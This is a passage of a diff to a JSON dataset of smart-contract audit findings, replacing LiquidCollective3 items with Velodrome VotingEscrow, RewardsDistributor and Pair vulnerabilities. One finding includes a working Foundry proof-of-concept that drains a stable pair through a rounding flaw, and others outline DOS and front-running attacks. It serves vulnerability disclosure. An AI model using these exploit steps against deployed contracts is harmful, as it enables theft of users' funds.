MAX_DELEGATES = 1024", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "Any user can delegate the balance of the locked NFT amount to anyone by calling delegate. As the delegated tokens are maintained in an array that's vulnerable to DOS attack, the VotingEscrow has a safety check of MAX_DELEGATES = 1024 preventing an address from having a huge array. Given the current implementation, any user with 1024 delegated tokens takes approximately 23M gas to transfer/burn/mint a token. However, the current gas limit of the OP chain is 15M (ref: Op-scan). It's cheaper to delegate from an address with a shorter token list to an address with a longer token list, so someone can attack a victim's address by creating a new address, a new lock, and delegating to the victim. By the time the attacker hits the gas limit, the victim cannot withdraw/transfer/delegate.", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Low Risk" + "Velodrome", + "Severity: High Risk" ] }, { - "title": "Calculation of currentMaxCommittableAmount can be simplified", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "currentMaxCommittableAmount is calculated as: // we adapt the value for the reporting period by using the asset balance as upper bound uint256 underlyingAssetBalance = _assetBalance(); uint256 currentBalanceToDeposit = BalanceToDeposit.get(); ... uint256 currentMaxCommittableAmount = LibUint256.min( LibUint256.min(underlyingAssetBalance, (currentMaxDailyCommittableAmount * period) / 1 days), currentBalanceToDeposit ); But underlyingAssetBalance is B_u = B_v + B_d + B_c + B_r + 32(C_d - C_r), which is greater than currentBalanceToDeposit B_d since the other components are non-negative values.
parameter : description; B_v : LastConsensusLayerReport.get().validatorsBalance; B_d : BalanceToDeposit.get(); B_c : CommittedBalance.get(); B_r : BalanceToRedeem.get(); C_d : DepositedValidatorCount.get(); C_r : LastConsensusLayerReport.get().validatorsCount; M : currentMaxCommittableAmount; m : (currentMaxDailyCommittableAmount * period) / 1 days; B_u : underlyingAssetBalance. Note that the fact that C_d >= C_r is an invariant that is enforced by the protocol, and so currently we are computing M as: M = min(B_u, B_d, m) = min(B_d, m) since B_u >= B_d.", + "title": "Inflated voting balance due to duplicated veNFTs within a checkpoint", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "Note: This issue affects the VotingEscrow._moveTokenDelegates and VotingEscrow._moveAllDelegates functions. A checkpoint can contain duplicated veNFTs (tokenIDs) under certain circumstances, leading to double counting of voting balance. Malicious users could exploit this vulnerability to inflate the voting balance of their accounts and participate in governance and gauge weight voting, potentially causing loss of assets or rewards for other users if the inflated voting balance is used in a malicious manner (e.g. redirect rewards to gauges where attackers have a vested interest). Following is the high-level pseudo-code of the existing _moveTokenDelegates function, which is crucial for understanding the issue. 1. Assuming moving tokenID=888 from Alice to Bob. 2. Source Code Logic (Moving tokenID=888 out of Alice): Fetch the existing Alice's token IDs and assign them to srcRepOld. Create a new empty array = srcRepNew. Copy all the token IDs in srcRepOld to srcRepNew except for tokenID=888. 3. Destination Code Logic (Moving tokenID=888 into Bob): Fetch the existing Bob's token IDs and assign them to dstRepOld. Create a new empty array = dstRepNew. Copy all the token IDs in dstRepOld to dstRepNew. Copy tokenID=888 to dstRepNew. The existing logic works fine as long as a new empty array (srcRepNew OR dstRepNew) is created every single time. The code relies on the _findWhatCheckpointToWrite function to return the index of a new checkpoint. function _moveTokenDelegates( ..SNIP.. uint32 nextSrcRepNum = _findWhatCheckpointToWrite(srcRep); uint256[] storage srcRepNew = _checkpoints[srcRep][nextSrcRepNum].tokenIds; However, the problem is that the _findWhatCheckpointToWrite function does not always return the index of a new checkpoint (Refer to Line 1357 below). It will return the last checkpoint if it has already been written once within the same block. function _findWhatCheckpointToWrite(address account) internal view returns (uint32) { uint256 _blockNumber = block.number; uint32 _nCheckPoints = numCheckpoints[account]; if (_nCheckPoints > 0 && _checkpoints[account][_nCheckPoints - 1].fromBlock == _blockNumber) { return _nCheckPoints - 1; } else { return _nCheckPoints; } } If someone triggers the _moveTokenDelegates more than once within the same block (e.g. perform NFT transfer twice to the same person), the _findWhatCheckpointToWrite function will return a new checkpoint in the first transfer but will return the last/previous checkpoint in the second transfer. This will cause the move token delegate logic to be off during the second transfer.
First Transfer at Block 1000 Assume the following states: numCheckpoints[Alice] = 1 _checkpoints[Alice][0].tokenIds = [n1, n2] <== Most recent checkpoint numCheckpoints[Bob] = 1 _checkpoints[Bob][0].tokenIds = [n3] <== Most recent checkpoint To move tokenID=2 from Alice to Bob, the _moveTokenDelegates(Alice, Bob, n2) function will be triggered. The _findWhatCheckpointToWrite will return the index of 1, which points to a new array. The end states of the first transfer will be as follows: numCheckpoints[Alice] = 2 _checkpoints[Alice][0].tokenIds = [n1, n2] _checkpoints[Alice][1].tokenIds = [n1] <== Most recent checkpoint numCheckpoints[Bob] = 2 _checkpoints[Bob][0].tokenIds = [n3] _checkpoints[Bob][1].tokenIds = [n2, n3] <== Most recent checkpoint Everything is working fine at this point in time. Second Transfer at Block 1000 (same block) To move tokenID=1 from Alice to Bob, the _moveTokenDelegates(Alice, Bob, n1) function will be triggered. This time round, since the last checkpoint block is the same as the current block, the _findWhatCheckpointToWrite function will return the last checkpoint instead of a new checkpoint. The srcRepNew and dstRepNew will end up referencing the old checkpoint instead of a new checkpoint. As such, the srcRepNew and dstRepNew arrays will reference back to the old checkpoints _checkpoints[Alice][1].tokenIds and _checkpoints[Bob][1].tokenIds respectively. The end state of the second transfer will be as follows: numCheckpoints[Alice] = 3 _checkpoints[Alice][0].tokenIds = [n1, n2] _checkpoints[Alice][1].tokenIds = [n1] <== Most recent checkpoint numCheckpoints[Bob] = 3 _checkpoints[Bob][0].tokenIds = [n3] _checkpoints[Bob][1].tokenIds = [n2, n3, n2, n3, n1] <== Most recent checkpoint Four (4) problems could be observed from the end state: 1. The numCheckpoints is incorrect. Should be two (2) instead of three (3). 2. TokenID=1 has been added to Bob's Checkpoint, but it has not been removed from Alice's Checkpoint. 3. Bob's Checkpoint contains duplicated tokenIDs (e.g. there are two TokenID=2 and TokenID=3). 4. TokenID is not unique (e.g. TokenID appears more than once). Since the token IDs within the checkpoint will be used to determine the voting power, the voting power will be inflated in this case as there will be a double count of certain NFTs. function _moveTokenDelegates( ..SNIP.. uint32 nextSrcRepNum = _findWhatCheckpointToWrite(srcRep); uint256[] storage srcRepNew = _checkpoints[srcRep][nextSrcRepNum].tokenIds; Additional Comment about nextSrcRepNum variable and _findWhatCheckpointToWrite function In Line 1320 below, the code wrongly assumes that the _findWhatCheckpointToWrite function will always return the index of the next new checkpoint. The _findWhatCheckpointToWrite function will return the index of the latest checkpoint instead of a new one if block.number == checkpoint.fromBlock. function _moveTokenDelegates( address srcRep, address dstRep, uint256 _tokenId ) internal { if (srcRep != dstRep && _tokenId > 0) { if (srcRep != address(0)) { uint32 srcRepNum = numCheckpoints[srcRep]; uint256[] storage srcRepOld = srcRepNum > 0 ? _checkpoints[srcRep][srcRepNum - 1].tokenIds : _checkpoints[srcRep][0].tokenIds; uint32 nextSrcRepNum = _findWhatCheckpointToWrite(srcRep); uint256[] storage srcRepNew = _checkpoints[srcRep][nextSrcRepNum].tokenIds; Additional Comment about numCheckpoints In Line 1330 below, the function computes the new number of checkpoints by incrementing the srcRepNum by one.
However, this is incorrect because if block.number == checkpoint.fromBlock, then the number of checkpoints remains the same and does not increment. function _moveTokenDelegates( address srcRep, address dstRep, uint256 _tokenId ) internal { if (srcRep != dstRep && _tokenId > 0) { if (srcRep != address(0)) { uint32 srcRepNum = numCheckpoints[srcRep]; uint256[] storage srcRepOld = srcRepNum > 0 ? _checkpoints[srcRep][srcRepNum - 1].tokenIds : _checkpoints[srcRep][0].tokenIds; uint32 nextSrcRepNum = _findWhatCheckpointToWrite(srcRep); uint256[] storage srcRepNew = _checkpoints[srcRep][nextSrcRepNum].tokenIds; // All the same except _tokenId for (uint256 i = 0; i < srcRepOld.length; i++) { uint256 tId = srcRepOld[i]; if (tId != _tokenId) { srcRepNew.push(tId); } } numCheckpoints[srcRep] = srcRepNum + 1; }", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Gas Optimization" + "Velodrome", + "Severity: High Risk" ] }, { - "title": "Remove redundant array length check and variable to save gas.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "When someone calls ConsensusLayerDepositManager.depositToConsensusLayer, the contract will verify that the receivedSignatureCount matches the receivedPublicKeyCount returned from _getNextValidators. This is unnecessary as the code always creates them with the same length.", + "title": "Rebase rewards cannot be claimed after a veNFT expires", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "Note: This issue affects both the RewardsDistributor.claim and RewardsDistributor.claimMany functions. A user will claim their rebase rewards via the RewardsDistributor.claim function, which will trigger the VotingEscrow.deposit_for function. function claim(uint256 _tokenId) external returns (uint256) { if (block.timestamp >= timeCursor) _checkpointTotalSupply(); uint256 _lastTokenTime = lastTokenTime; _lastTokenTime = (_lastTokenTime / WEEK) * WEEK; uint256 amount = _claim(_tokenId, _lastTokenTime); if (amount != 0) { IVotingEscrow(ve).depositFor(_tokenId, amount); tokenLastBalance -= amount; } return amount; } Within the VotingEscrow.deposit_for function, the require statement at line 812 below will verify that the veNFT performing the claim has not expired yet. function depositFor(uint256 _tokenId, uint256 _value) external nonReentrant { LockedBalance memory oldLocked = _locked[_tokenId]; require(_value > 0, \"VotingEscrow: zero amount\"); require(oldLocked.amount > 0, \"VotingEscrow: no existing lock found\"); require(oldLocked.end > block.timestamp, \"VotingEscrow: cannot add to expired lock, withdraw\"); _depositFor(_tokenId, _value, 0, oldLocked, DepositType.DEPOSIT_FOR_TYPE); } If a user claims the rebase rewards after their veNFT's lock has expired, the VotingEscrow.depositFor function will always revert.
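The failing path can be sketched as a call trace (illustrative only, mirroring the code quoted above): // RewardsDistributor.claim(tokenId) -> VotingEscrow.depositFor(tokenId, amount) // -> require(oldLocked.end > block.timestamp) is false once the lock has expired // -> revert \"VotingEscrow: cannot add to expired lock, withdraw\"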
As a result, the accumulated rebase rewards will be stuck in the RewardsDistributor contract and users will not be able to retrieve them.", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Gas Optimization" + "Velodrome", + "Severity: High Risk" ] }, { - "title": "Duplicated events emitted in River and RedeemManager", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "The amount of ETH pulled from the redeem contract when setConsensusData is called by the oracle is notified with events in both the RedeemManager and River contracts.", + "title": "Claimed rebase rewards of managed NFT are not compounded within LockedManagedReward", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "Rebase rewards of a managed NFT should be compounded within the LockedManagedRewards contract. However, this is not currently implemented. When someone calls the RewardsDistributor.claim with a managed NFT, the claimed rebase rewards will be locked via the VotingEscrow.depositFor function (refer to Line 277 below). However, the VotingEscrow.depositFor function fails to notify the LockedManagedRewards contract of the incoming rewards. Thus, the rewards do not accrue in the LockedManagedRewards. function claim(uint256 _tokenId) external returns (uint256) { if (block.timestamp >= timeCursor) _checkpointTotalSupply(); uint256 _lastTokenTime = lastTokenTime; _lastTokenTime = (_lastTokenTime / WEEK) * WEEK; uint256 amount = _claim(_tokenId, _lastTokenTime); if (amount != 0) { IVotingEscrow(ve).depositFor(_tokenId, amount); tokenLastBalance -= amount; } return amount; } One of the purposes of the LockedManagedRewards contract is to accrue rebase rewards claimed by the managed NFT so that the users will receive their pro-rata portion of the rebase rewards, based on their contribution to the managed NFT, when they withdraw their normal NFTs from the managed NFT via the VotingEscrow.withdrawManaged function. /// @inheritdoc IVotingEscrow function withdrawManaged(uint256 _tokenId) external nonReentrant { ..SNIP.. uint256 _reward = IReward(_lockedManagedReward).earned(address(token), _tokenId); ..SNIP.. // claim locked rewards (rebases + compounded reward) address[] memory rewards = new address[](1); rewards[0] = address(token); IReward(_lockedManagedReward).getReward(_tokenId, rewards); If the rebase rewards are not accrued in the LockedManagedRewards, users will not receive their pro-rata portion of the rebase rewards during withdrawal.", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Gas Optimization" + "Velodrome", + "Severity: High Risk" ] }, { - "title": "totalRequestedExitsValue's calculation can be simplified", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "In the for loop in this context, totalRequestedExitsValue is updated for every operator that satisfies _getActiveValidatorCountForExitRequests(operators[idx]) == highestActiveCount.
Based on the used increments, their sum equals optimalTotalDispatchCount.", + "title": "Malicious users could deposit normal NFTs to a managed NFT on behalf of others without their permission", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "The VotingEscrow.depositManaged function did not verify that the caller (msg.sender) is the owner of the _tokenId. As a result, a malicious user can deposit normal NFTs to a managed NFT on behalf of others without their permission. function depositManaged(uint256 _tokenId, uint256 _mTokenId) external nonReentrant { require(escrowType[_mTokenId] == EscrowType.MANAGED, \"VotingEscrow: can only deposit into managed nft\"); require(!deactivated[_mTokenId], \"VotingEscrow: inactive managed nft\"); require(escrowType[_tokenId] == EscrowType.NORMAL, \"VotingEscrow: can only deposit normal nft\"); require(!voted[_tokenId], \"VotingEscrow: nft voted\"); require(ownershipChange[_tokenId] != block.number, \"VotingEscrow: flash nft protection\"); require(_balanceOfNFT(_tokenId, block.timestamp) > 0, \"VotingEscrow: no balance to deposit\"); ..SNIP.. The owner of a normal NFT will have their voting balance transferred to a malicious managed NFT, resulting in loss of rewards and voting power for the victim. Additionally, a malicious owner of a managed NFT could aggregate the voting power of the victims' normal NFTs and perform malicious actions such as stealing the rewards from the victims or using its inflated voting power to pass malicious proposals.", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Low Risk" + "Velodrome", + "Severity: High Risk" ] }, { + "title": "First liquidity provider of a stable pair can DOS the pool", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "The invariant k of a stable pool is calculated as follows Pair.sol#L505 function _k(uint256 x, uint256 y) internal view returns (uint256) { if (stable) { uint256 _x = (x * 1e18) / decimals0; uint256 _y = (y * 1e18) / decimals1; uint256 _a = (_x * _y) / 1e18; uint256 _b = ((_x * _x) / 1e18 + (_y * _y) / 1e18); return (_a * _b) / 1e18; // x3y+y3x >= k } else { return x * y; // xy >= k } } The value of _a = (_x * _y) / 1e18 = 0 due to rounding error when _x * _y < 1e18. The rounding error can lead to the invariant k of stable pools being zero, and the trader can steal whatever is left in the pool. The first liquidity provider can DOS the pair by: 1. minting a small amount of liquidity to the pool, 2. stealing whatever is left in the pool, 3. repeating steps 1 and 2 until the total supply overflows. To prevent the issue of rounding error, the reserve of a pool should never go too small.
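A worked example makes the truncation concrete (assuming both tokens use 18 decimals, so _x == x and _y == y): // x = y = 10_000_000 => _a = (1e7 * 1e7) / 1e18 = 1e14 / 1e18 = 0 (integer division truncates) // _b = 0 for the same reason, so _k(x, y) == 0 and any swap that keeps k >= 0 passes the curve check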
The mint function which was borrowed from uniswapV2 has a minimum liquidity check of sqrt(a * b) > MINIMUM_LIQUIDITY; This, however, isn't safe enough to protect the invariant formula of stable pools. Pair.sol#L344-L363 uint256 internal constant MINIMUM_LIQUIDITY = 10**3; // ... function mint(address to) external nonReentrant returns (uint256 liquidity) { // ... uint256 _amount0 = _balance0 - _reserve0; uint256 _amount1 = _balance1 - _reserve1; uint256 _totalSupply = totalSupply(); if (_totalSupply == 0) { liquidity = Math.sqrt(_amount0 * _amount1) - MINIMUM_LIQUIDITY; //@audit what about the fee? _mint(address(1), MINIMUM_LIQUIDITY); // permanently lock the first MINIMUM_LIQUIDITY tokens - cannot be address(0) // ... } This is the POC of an exploit extended from Pair.t.sol contract PairTest is BaseTest { // ... function drainPair(Pair pair, uint initialFraxAmount, uint initialDaiAmount) internal { DAI.transfer(address(pair), 1); uint amount0; uint amount1; if (address(DAI) < address(FRAX)) { amount0 = 0; amount1 = initialFraxAmount - 1; } else { amount1 = 0; amount0 = initialFraxAmount - 1; } pair.swap(amount0, amount1, address(this), new bytes(0)); FRAX.transfer(address(pair), 1); if (address(DAI) < address(FRAX)) { amount0 = initialDaiAmount; // initialDaiAmount + 1 - 1 amount1 = 0; } else { amount1 = initialDaiAmount; // initialDaiAmount + 1 - 1 amount0 = 0; } pair.swap(amount0, amount1, address(this), new bytes(0)); } function testDestroyPair() public { deployCoins(); deal(address(DAI), address(this), 100 ether); deal(address(FRAX), address(this), 100 ether); deployFactories(); Pair pair = Pair(factory.createPair(address(DAI), address(FRAX), true)); for(uint i = 0; i < 10; i++) { DAI.transfer(address(pair), 10_000_000); FRAX.transfer(address(pair), 10_000_000); // as long as 10_000_000^2 < 1e18 uint liquidity = pair.mint(address(this)); console.log(\"pair:\", address(pair), \"liquidity:\", liquidity); console.log(\"total liq:\", pair.balanceOf(address(this))); drainPair(pair, FRAX.balanceOf(address(pair)), DAI.balanceOf(address(pair))); console.log(\"DAI balance:\", DAI.balanceOf(address(pair))); console.log(\"FRAX balance:\", FRAX.balanceOf(address(pair))); require(DAI.balanceOf(address(pair)) == 1, \"should drain DAI balance\"); require(FRAX.balanceOf(address(pair)) == 2, \"should drain FRAX balance\"); } DAI.transfer(address(pair), 1 ether); FRAX.transfer(address(pair), 1 ether); vm.expectRevert(); pair.mint(address(this)); } }", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Gas Optimization" + "Velodrome", + "Severity: High Risk" ] }, { - "title": "Add more comments/documentation for ConsensusLayerReport and StoredConsensusLayerReport structs", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "The ConsensusLayerReport and StoredConsensusLayerReport structs are defined as /// @notice The format of the oracle report struct ConsensusLayerReport { uint256 epoch; uint256 validatorsBalance; uint256 validatorsSkimmedBalance; uint256 validatorsExitedBalance; uint256 validatorsExitingBalance; uint32 validatorsCount; uint32[] stoppedValidatorCountPerOperator; bool bufferRebalancingMode; bool slashingContainmentMode; } /// @notice The format of the oracle report in storage struct StoredConsensusLayerReport { uint256 epoch; uint256 validatorsBalance; uint256 validatorsSkimmedBalance; uint256 validatorsExitedBalance; uint256 validatorsExitingBalance; uint32 validatorsCount; bool
bufferRebalancingMode; bool slashingContainmentMode; } Comments regarding their specified fields are lacking.", + "title": "Certain functions are unavailable after opting in to the \"auto compounder\"", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "Certain features (e.g., delegation, governance voting) of a veNFT would not be available if the veNFT is transferred to the auto compounder. Let x be a managed veNFT. When an \"auto compounder\" is created, ownership of x is transferred to the AutoCompounder contract, and any delegation within x is cleared. The auto compounder can perform gauge weight voting using x via the provided AutoCompounder.vote function. However, it loses the ability to perform any delegation with x because the AutoCompounder contract does not contain a function that calls the VotingEscrow.delegate function. Only the owner of x, the AutoCompounder contract, can call the VotingEscrow.delegate function. x also loses the ability to vote on governance proposals, as the existing AutoCompounder contract does not support this feature. Once the owner of the managed NFTs has opted in to the \"auto compounder,\" it is not possible for them to subsequently \"opt out.\" Consequently, if they need to exercise delegation and governance voting, they will be unable to do so, exacerbating the impact.", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Informational" + "Velodrome", + "Severity: Medium Risk" ] }, { - "title": "postUnderlyingBalanceIncludingExits and preUnderlyingBalanceIncludingExits can be removed from setConsensusLayerData", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "Both postUnderlyingBalanceIncludingExits (B_u^post) and preUnderlyingBalanceIncludingExits (B_u^pre) include the skimmed and exited amounts accumulated over time, part of which might have exited the protocol through redeeming (or been skimmed back to CL and penalized). Their delta is almost the same as the delta of vars.postReportUnderlyingBalance and vars.preReportUnderlyingBalance (almost, if one adds a check for non-decreasing validator counts). Notation: B_u^post: postUnderlyingBalanceIncludingExits. B_u^pre: preUnderlyingBalanceIncludingExits. ΔB_u = B_u^post - B_u^pre. B_u^report,post: vars.postReportUnderlyingBalance. B_u^report,pre: vars.preReportUnderlyingBalance. ΔB_u^report = B_u^report,post - B_u^report,pre. B_v^prev: previous reported/stored value for the total validator balances in CL, LastConsensusLayerReport.get().validatorsBalance. B_v^curr: current reported value of the total validator balances in CL, report.validatorsBalance. ΔB_v = B_v^curr - B_v^prev (can be negative). B_s^prev: LastConsensusLayerReport.get().validatorsSkimmedBalance. B_s^curr: report.validatorsSkimmedBalance. ΔB_s = B_s^curr - B_s^prev (always non-negative, this is an invariant that gets checked). B_e^prev: LastConsensusLayerReport.get().validatorsExitedBalance. B_e^curr: report.validatorsExitedBalance. ΔB_e = B_e^curr - B_e^prev (always non-negative, this is an invariant that gets checked). C^prev: LastConsensusLayerReport.get().validatorsCount. C^curr: report.validatorsCount. ΔC = C^curr - C^prev (this value should be non-negative; note this invariant has not been checked in the codebase). C^deposit: DepositedValidatorCount.get(). B_d: BalanceToDeposit.get(). B_c: CommittedBalance.get(). B_r: BalanceToRedeem.get(). Note that the above values are assumed to be in their form before the current report gets stored. Then we would have B_u^post = B_v^curr + B_s^curr + B_e^curr = B_u^pre + ΔB_v + ΔB_s + ΔB_e - 32ΔC, and so: ΔB_u = ΔB_v + ΔB_s + ΔB_e - 32ΔC = ΔB_u^report", + "title": "Claimable gauge distributions are locked when killGauge is called", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "When a gauge is killed, the claimable[_gauge] key value is cleared. Because any rewards received by the Voter contract are indexed and distributed in proportion to each pool's weight, this claimable amount is permanently locked within the contract.", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Informational" + "Velodrome", + "Severity: Medium Risk" ] }, { - "title": "The formula or the parameter names for calculating currentMaxDailyCommittableAmount can be made more clear", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "currentMaxDailyCommittableAmount is calculated using the below formula: // we compute the max daily committable amount by taking the asset balance without the balance to deposit into account uint256 currentMaxDailyCommittableAmount = LibUint256.max( dcl.maxDailyNetCommittableAmount, (uint256(dcl.maxDailyRelativeCommittableAmount) * (underlyingAssetBalance - currentBalanceToDeposit)) / LibBasisPoints.BASIS_POINTS_MAX ); Therefore its value is the maximum of two potential maximum values.", + "title": "Bribe and fee token emissions can be gamed by users", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "A user may vote or reset their vote once per epoch. Votes persist across epochs, and once a user has distributed their votes among their chosen pools, the poke() function may be called by any user to update the target user's decayed veNFT token balance. However, the poke() function is not hooked into any of the reward distribution contracts. As a result, a user is incentivized to vote as soon as they create their lock and to avoid re-voting in subsequent epochs. The amount deposited via Reward._deposit() does not decay linearly, as it would under veToken mechanics. Therefore, users could continue to earn trading fees and bribes even after their lock has expired. Simultaneously, users can poke() other users to lower their voting weight and maximize their own earnings.", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Informational" + "Velodrome", + "Severity: Medium Risk" ] }, { - "title": "preExitingBalance is a rough estimate for signalling the number of validators to request to exit", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "exitingBalance and preExitingBalance might be trying to compensate for the same portion of balance (non-stopped validators which have been signaled to exit and are in the CL exit queue).
That means the number of validatorCountToExit calculated to accommodate the redeem demand is actually lower than what is required. The important portion of preExitingBalance is for the validators that were signaled to exit in the previous reporting round but that the operators have not yet registered for exit in the CL. Also, totalStoppedValidatorCount can include slashed validator counts, which again lowers the required validatorCountToExit; those values should not be accounted for here. Perhaps the oracle members should also report the slashing counts of validators so that one can calculate these values more accurately.", + "title": "Compromised or malicious owner can drain the VotingEscrow contract of VELO tokens", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "The FactoryRegistry contract is an Ownable contract with the ability to control the return value of the managedRewardsFactory() function. As such, whenever createManagedLockFor() is called in VotingEscrow, the FactoryRegistry contract queries the managedRewardsFactory() function and subsequently calls createRewards() on this address. If ownership of the FactoryRegistry contract is compromised or malicious, the createRewards() external call can return any arbitrary _lockedManagedReward address, which is then given an infinite token approval. As a result, it is possible for all locked VELO tokens to be drained, and hence this poses a significant centralization risk to the protocol.", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Informational" + "Velodrome", + "Severity: Medium Risk" ] }, { - "title": "More documentation can be added regarding the currentMaxDailyCommittableAmount calculation", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "currentMaxDailyCommittableAmount is calculated as: // we compute the max daily committable amount by taking the asset balance without the balance to deposit into account uint256 currentMaxDailyCommittableAmount = LibUint256.max( dcl.maxDailyNetCommittableAmount, (uint256(dcl.maxDailyRelativeCommittableAmount) * (underlyingAssetBalance - currentBalanceToDeposit)) / LibBasisPoints.BASIS_POINTS_MAX ); We can add further to the comment: Since before the _commitBalanceToDeposit hook is called we have skimmed the remaining to redeem balance to BalanceToDeposit, underlyingAssetBalance - currentBalanceToDeposit represents the funds allocated for CL (funds that are already in CL, funds that are in transit to CL or funds committed to be deposited to CL). It is important that the redeem balance is already skimmed for this upper bound calculation, so for future code changes we should pay attention to the order of hook callbacks, otherwise the upper bounds would be different.", + "title": "Unsafe casting in RewardsDistributor leads to underflow of veForAt", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "Solidity does not revert when casting a negative number to uint. Instead, it underflows to a large number. In the RewardDistributor contract, the balance of a token at a specific time is calculated as follows: IVotingEscrow.Point memory pt = IVotingEscrow(_ve).userPointHistory(_tokenId, epoch); Math.max(uint256(int256(pt.bias - pt.slope * (int128(int256(_timestamp - pt.ts))))), 0); This is supposed to return zero when the calculated balance is a negative number.
However, it underflows to a large number. This would lead to incorrect reward distribution if third-party protocols depend on this function, or when further updates make use of this codebase.", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Informational" + "Velodrome", + "Severity: Medium Risk" ] }, { - "title": "BalanceToRedeem is only non-zero during a report processing transaction", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "BalanceToRedeem only ever possesses a non-zero value during report processing, when a quorum has been reached for the oracle member votes (setConsensusLayerData). At the very end of this process its value gets reset back to 0.", + "title": "Proposals can be griefed by front-running and canceling", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "Because the Governor uses OZ's implementation, a griefer can front-run a valid proposal with the same settings and then immediately cancel it. You can avoid the grief by writing a macro contract that generates random descriptions to avoid the front-run. See: code-423n4/2022-09-nouns-builder-findings#182.", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Informational" + "Velodrome", + "Severity: Medium Risk" ] }, { - "title": "Improve clarity on bufferRebalancingMode variable", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "According to the documentation, the bufferRebalancingMode flag passed by the oracle should allow or disallow the rebalancing of funds between the Deposit and Redeem buffers. The flag correctly disables rebalancing in the DepositBuffer to RedeemBuffer direction, as can be seen here: if (depositToRedeemRebalancingAllowed && availableBalanceToDeposit > 0) { uint256 rebalancingAmount = LibUint256.min( availableBalanceToDeposit, redeemManagerDemandInEth - exitingBalance - availableBalanceToRedeem ); if (rebalancingAmount > 0) { availableBalanceToRedeem += rebalancingAmount; _setBalanceToRedeem(availableBalanceToRedeem); _setBalanceToDeposit(availableBalanceToDeposit - rebalancingAmount); } } but it is not used at all when pulling funds the other way: // if funds are left in the balance to redeem, we move them to the deposit balance _skimExcessBalanceToRedeem();", + "title": "pairFor does not correctly sort tokens when overriding for SinkConverter", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "The router will always search for pairs by sorting tokenA and tokenB. Notably, for the velo and veloV2 pair, the Router will not perform the sorting: //Router.sol#L69-L73 if (factory == defaultFactory) { if ((tokenA == IPairFactory(defaultFactory).velo()) && (tokenB == IPairFactory(defaultFactory).veloV2())) { return IPairFactory(defaultFactory).sinkConverter(); } } This means the pair for Velo -> Velo2 will be the SinkConverter, but the pair for Velo2 -> Velo will be some other pair. Additionally, you can front-run a call to setSinkConverter() by calling createPair() with the same parameters. However, the respective values for getPair() would be overwritten with the sinkConverter address.
This could lead to some weird and unexpected behaviour, as we would still have an invalid Pair contract for the v1 and v2 velo tokens.", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Informational" + "Velodrome", + "Severity: Medium Risk" ] }, { - "title": "Fix code style consistency issues", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "There is a small code styling mismatch between the new code under audit and the style used throughout the rest of the code. Specifically, function parameter names are supposed to be prepended with _ to differentiate them from variables defined in the function body.", + "title": "Inconsistency between balanceOfNFT, balanceOfNFTAt and _balanceOfNFT functions", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "The balanceOfNFT function implements a flash-loan protection that returns zero voting balance if ownershipChange[_tokenId] == block.number. However, this was not consistently applied to the balanceOfNFTAt and _balanceOfNFT functions. VotingEscrow.sol: function balanceOfNFT(uint256 _tokenId) external view returns (uint256) { if (ownershipChange[_tokenId] == block.number) return 0; return _balanceOfNFT(_tokenId, 